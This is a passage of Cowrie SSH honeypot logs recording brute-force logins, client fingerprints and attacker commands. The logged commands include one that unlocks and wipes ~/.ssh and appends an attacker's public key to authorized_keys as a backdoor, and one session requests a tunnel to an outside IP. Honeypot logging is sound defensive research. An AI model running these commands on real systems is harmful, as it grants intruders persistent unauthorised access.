ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:29:00.557658Z","src_ip":"212.227.235.229","session":"228040ccef06"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T01:29:01.778063Z","src_ip":"212.227.235.229","session":"228040ccef06"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:29:03.075703Z","src_ip":"212.227.235.229","session":"228040ccef06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40696,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cb6db0d254f","protocol":"ssh","message":"New connection: 212.227.235.229:40696 (1.2.3.4:22) [session: 4cb6db0d254f]","sensor":"my-vps","timestamp":"2025-08-28T01:29:03.379241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:29:03.380076Z","src_ip":"212.227.235.229","session":"4cb6db0d254f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:29:03.683582Z","src_ip":"212.227.235.229","session":"4cb6db0d254f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:29:04.939671Z","src_ip":"212.227.235.229","session":"4cb6db0d254f"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:29:05.244297Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:29:05.245432Z","src_ip":"212.227.235.229","session":"4cb6db0d254f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53290,"dst_ip":"1.2.3.4","dst_port":22,"session":"93342ae0bbe3","protocol":"ssh","message":"New connection: 212.227.235.229:53290 (1.2.3.4:22) [session: 93342ae0bbe3]","sensor":"my-vps","timestamp":"2025-08-28T01:29:05.352260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:29:05.353218Z","src_ip":"212.227.235.229","session":"93342ae0bbe3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:29:05.607382Z","src_ip":"212.227.235.229","session":"93342ae0bbe3"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@123","message":"login attempt [root/Root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:29:06.676631Z","src_ip":"212.227.235.229","session":"93342ae0bbe3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:29:07.207001Z","src_ip":"212.227.235.229","session":"93342ae0bbe3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:29:07.207726Z","src_ip":"212.227.235.229","session":"93342ae0bbe3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:29:07.208488Z","src_ip":"212.227.235.229","session":"93342ae0bbe3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:29:07.463041Z","src_ip":"212.227.235.229","session":"93342ae0bbe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":16018,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9886ffd901e","protocol":"ssh","message":"New connection: 212.227.125.160:16018 (1.2.3.4:22) [session: b9886ffd901e]","sensor":"my-vps","timestamp":"2025-08-28T01:29:07.839517Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:29:07.840737Z","src_ip":"212.227.125.160","session":"b9886ffd901e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":16282,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5c51a709e69","protocol":"ssh","message":"New connection: 212.227.125.160:16282 (1.2.3.4:22) [session: a5c51a709e69]","sensor":"my-vps","timestamp":"2025-08-28T01:29:07.956419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:29:07.957259Z","src_ip":"212.227.125.160","session":"a5c51a709e69"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T01:29:08.074270Z","src_ip":"212.227.125.160","session":"a5c51a709e69"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:29:08.424935Z","src_ip":"212.227.125.160","session":"a5c51a709e69"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T01:29:08.543020Z","session":"a5c51a709e69"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":42836,"dst_ip":"1.2.3.4","dst_port":22,"session":"880205d1d8ec","protocol":"ssh","message":"New connection: 194.233.79.134:42836 (1.2.3.4:22) [session: 880205d1d8ec]","sensor":"my-vps","timestamp":"2025-08-28T01:29:50.026568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:29:50.776119Z","src_ip":"194.233.79.134","session":"880205d1d8ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:29:50.776789Z","src_ip":"194.233.79.134","session":"880205d1d8ec"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-28T01:29:53.252614Z","src_ip":"194.233.79.134","session":"880205d1d8ec"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:29:55.063839Z","src_ip":"194.233.79.134","session":"880205d1d8ec"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:30:17.956435Z","src_ip":"212.227.125.160","session":"a5c51a709e69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48883,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2d6a653523b","protocol":"ssh","message":"New connection: 212.227.235.229:48883 (1.2.3.4:22) [session: c2d6a653523b]","sensor":"my-vps","timestamp":"2025-08-28T01:30:19.310710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:30:19.311860Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:30:19.388389Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.login.success","username":"root","password":"bbb123","message":"login attempt [root/bbb123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:30:19.697922Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:30:19.945994Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:30:19.946738Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:30:19.948052Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:30:20.027447Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:30:20.198280Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T01:30:20.199049Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T01:30:20.282068Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:30:20.282998Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49003,"dst_ip":"1.2.3.4","dst_port":22,"session":"281419d8989c","protocol":"ssh","message":"New connection: 212.227.235.229:49003 (1.2.3.4:22) [session: 281419d8989c]","sensor":"my-vps","timestamp":"2025-08-28T01:30:20.356121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:30:20.357026Z","src_ip":"212.227.235.229","session":"281419d8989c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:30:20.432668Z","src_ip":"212.227.235.229","session":"281419d8989c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T01:30:20.778096Z","src_ip":"212.227.235.229","session":"281419d8989c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:30:21.855772Z","src_ip":"212.227.235.229","session":"281419d8989c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49193,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0944ee02d1b","protocol":"ssh","message":"New connection: 212.227.235.229:49193 (1.2.3.4:22) [session: c0944ee02d1b]","sensor":"my-vps","timestamp":"2025-08-28T01:30:21.932616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:30:21.933342Z","src_ip":"212.227.235.229","session":"c0944ee02d1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:30:22.011136Z","src_ip":"212.227.235.229","session":"c0944ee02d1b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:30:22.363661Z","src_ip":"212.227.235.229","session":"c0944ee02d1b"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:30:22.442342Z","src_ip":"212.227.235.229","session":"c2d6a653523b"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:30:22.443474Z","src_ip":"212.227.235.229","session":"c0944ee02d1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44002,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f4a380fddc0","protocol":"ssh","message":"New connection: 212.227.125.160:44002 (1.2.3.4:22) [session: 7f4a380fddc0]","sensor":"my-vps","timestamp":"2025-08-28T01:31:08.592494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:31:08.593383Z","src_ip":"212.227.125.160","session":"7f4a380fddc0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-